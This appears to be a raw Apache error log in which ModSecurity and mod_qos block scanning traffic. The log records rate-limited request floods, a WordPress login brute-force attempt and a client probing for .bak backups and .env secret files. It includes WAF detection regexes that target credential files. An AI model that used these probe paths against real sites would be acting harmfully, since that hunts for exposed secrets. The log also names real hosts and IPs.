[Tue May 26 19:54:44.443220 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25K9wAAAZs"]
[Tue May 26 19:54:44.447703 2026] [security2:error] [pid 86490:tid 86734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEXwAAAPc"]
[Tue May 26 19:54:44.603200 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtLEqK9k_ZUB2Vp25LLwAAAZI
[Tue May 26 19:54:44.605926 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtLFZMwN0DpLVWo6LE2AAAANg
[Tue May 26 19:54:44.610928 2026] [qos:error] [pid 93868:tid 94304] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtLEqK9k_ZUB2Vp25LMAAAAb0
[Tue May 26 19:54:44.612099 2026] [qos:error] [pid 86490:tid 86673] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtLFZMwN0DpLVWo6LE3QAAALo
[Tue May 26 19:54:44.629453 2026] [qos:error] [pid 86490:tid 86720] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LE3gAAAOk
[Tue May 26 19:54:44.656017 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:49424] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LE3wAAAJ0
[Tue May 26 19:54:44.666819 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLGDRMqfxdEDkoszTIgAAAHQ
[Tue May 26 19:54:44.717143 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:49440] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LE4gAAAN8
[Tue May 26 19:54:44.760587 2026] [security2:error] [pid 93576:tid 93661] [remote 72.167.150.128:59322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtLGDRMqfxdEDkoszTFQAAN1A"]
[Tue May 26 19:54:44.880459 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:49424] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LE5AAAANo
[Tue May 26 19:54:44.880639 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLGDRMqfxdEDkoszTJQAAAHo
[Tue May 26 19:54:44.884441 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LE5gAAAME
[Tue May 26 19:54:44.884518 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LE5QAAAQA
[Tue May 26 19:54:44.884601 2026] [qos:error] [pid 93868:tid 94312] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLEqK9k_ZUB2Vp25LNQAAAcU
[Tue May 26 19:54:44.884793 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLGDRMqfxdEDkoszTJgAAADw
[Tue May 26 19:54:44.906039 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LE5wAAAMk
[Tue May 26 19:54:45.023106 2026] [security2:error] [pid 93576:tid 93777] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/old/log.bak"] [unique_id "ahWtLWDRMqfxdEDkoszTJwAAAEE"]
[Tue May 26 19:54:45.192692 2026] [security2:error] [pid 93576:tid 93773] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/config/secret.bak"] [unique_id "ahWtLWDRMqfxdEDkoszTKAAAAD0"]
[Tue May 26 19:54:45.285373 2026] [security2:error] [pid 93868:tid 94333] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25K_gAAAdo"]
[Tue May 26 19:54:45.298164 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszSzwAAAEM"]
[Tue May 26 19:54:45.299075 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszS0QAAAGg"]
[Tue May 26 19:54:45.308009 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEdQAAAPo"]
[Tue May 26 19:54:45.313613 2026] [security2:error] [pid 93868:tid 94298] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25LBgAAAbc"]
[Tue May 26 19:54:45.319805 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25K_QAAAZ8"]
[Tue May 26 19:54:45.323927 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25LBwAAAb4"]
[Tue May 26 19:54:45.332850 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszS2QAAAFY"]
[Tue May 26 19:54:45.334017 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszS1AAAACo"]
[Tue May 26 19:54:45.339030 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszS2wAAAGc"]
[Tue May 26 19:54:45.340683 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszS_QAAAFM"]
[Tue May 26 19:54:45.347669 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszS0wAAAG4"]
[Tue May 26 19:54:45.350770 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszS1QAAAGQ"]
[Tue May 26 19:54:45.362503 2026] [security2:error] [pid 93576:tid 93741] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/php/debug.bak"] [unique_id "ahWtLWDRMqfxdEDkoszTKQAAAB0"]
[Tue May 26 19:54:45.363493 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25K_wAAAb8"]
[Tue May 26 19:54:45.364650 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszS-QAAAHc"]
[Tue May 26 19:54:45.380336 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLFZMwN0DpLVWo6LEwAAAAN0"]
[Tue May 26 19:54:45.380723 2026] [security2:error] [pid 86490:tid 86722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEdwAAAOs"]
[Tue May 26 19:54:45.381059 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25LCwAAAg0"]
[Tue May 26 19:54:45.384219 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLFZMwN0DpLVWo6LEsgAAAJQ"]
[Tue May 26 19:54:45.385458 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszS-wAAAG8"]
[Tue May 26 19:54:45.387071 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLFZMwN0DpLVWo6LEuQAAANE"]
[Tue May 26 19:54:45.390541 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLEqK9k_ZUB2Vp25LHAAAAf4"]
[Tue May 26 19:54:45.404951 2026] [security2:error] [pid 86490:tid 86657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEgAAAAKo"]
[Tue May 26 19:54:45.408841 2026] [security2:error] [pid 86490:tid 86704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLFZMwN0DpLVWo6LEuAAAANk"]
[Tue May 26 19:54:45.412156 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszS8QAAAAo"]
[Tue May 26 19:54:45.430553 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25LBAAAAcc"]
[Tue May 26 19:54:45.430986 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLGDRMqfxdEDkoszTBgAAABQ"]
[Tue May 26 19:54:45.440294 2026] [security2:error] [pid 86490:tid 86640] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLFZMwN0DpLVWo6LEygAAAJk"]
[Tue May 26 19:54:45.440733 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLEqK9k_ZUB2Vp25LJwAAAac"]
[Tue May 26 19:54:45.444843 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLFZMwN0DpLVWo6LEvgAAALU"]
[Tue May 26 19:54:45.446128 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtLEqK9k_ZUB2Vp25LKAAAAaE"]
[Tue May 26 19:54:45.508275 2026] [security2:error] [pid 93576:tid 93663] [remote 72.167.150.128:59322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtLWDRMqfxdEDkoszTKgAAG1I"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:54:45.529769 2026] [security2:error] [pid 93576:tid 93717] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/master/.env"] [unique_id "ahWtLWDRMqfxdEDkoszTNQAAAAU"]
[Tue May 26 19:54:45.591006 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtLUqK9k_ZUB2Vp25LUwAAAZs
[Tue May 26 19:54:45.595207 2026] [qos:error] [pid 93868:tid 94378] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLUqK9k_ZUB2Vp25LVAAAAgc
[Tue May 26 19:54:45.598344 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFHgAAAKs
[Tue May 26 19:54:45.608586 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtLVZMwN0DpLVWo6LFHwAAAKY
[Tue May 26 19:54:45.645458 2026] [qos:error] [pid 93868:tid 94277] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLUqK9k_ZUB2Vp25LVQAAAaI
[Tue May 26 19:54:45.697823 2026] [security2:error] [pid 93576:tid 93806] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/code/api/.env"] [unique_id "ahWtLWDRMqfxdEDkoszTSQAAAF4"]
[Tue May 26 19:54:45.712857 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFIQAAAPc
[Tue May 26 19:54:45.743726 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLUqK9k_ZUB2Vp25LVgAAAdE
[Tue May 26 19:54:45.744113 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFJQAAAJQ
[Tue May 26 19:54:45.749982 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFJgAAAJg
[Tue May 26 19:54:45.774638 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFKgAAALE
[Tue May 26 19:54:45.797818 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:60006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLUqK9k_ZUB2Vp25LVwAAAZU
[Tue May 26 19:54:45.800080 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLUqK9k_ZUB2Vp25LWAAAAf0
[Tue May 26 19:54:45.865226 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFKwAAAKo
[Tue May 26 19:54:45.865614 2026] [security2:error] [pid 93576:tid 93773] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/agenda/.env"] [unique_id "ahWtLWDRMqfxdEDkoszTSwAAAD0"]
[Tue May 26 19:54:45.881048 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFLAAAAPM
[Tue May 26 19:54:45.893443 2026] [qos:error] [pid 93868:tid 94286] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLUqK9k_ZUB2Vp25LWQAAAas
[Tue May 26 19:54:45.897366 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFLQAAAOY
[Tue May 26 19:54:45.902975 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFLgAAANk
[Tue May 26 19:54:45.904579 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:60024] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLVZMwN0DpLVWo6LFLwAAAOw
[Tue May 26 19:54:46.012562 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFMwAAALU
[Tue May 26 19:54:46.018887 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLkqK9k_ZUB2Vp25LWgAAAeM
[Tue May 26 19:54:46.019948 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFNAAAAL4
[Tue May 26 19:54:46.024474 2026] [qos:error] [pid 93868:tid 94359] [client 45.148.10.120:60006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLkqK9k_ZUB2Vp25LWwAAAfQ
[Tue May 26 19:54:46.030257 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLkqK9k_ZUB2Vp25LXAAAAdc
[Tue May 26 19:54:46.032571 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLlZMwN0DpLVWo6LFNQAAALs
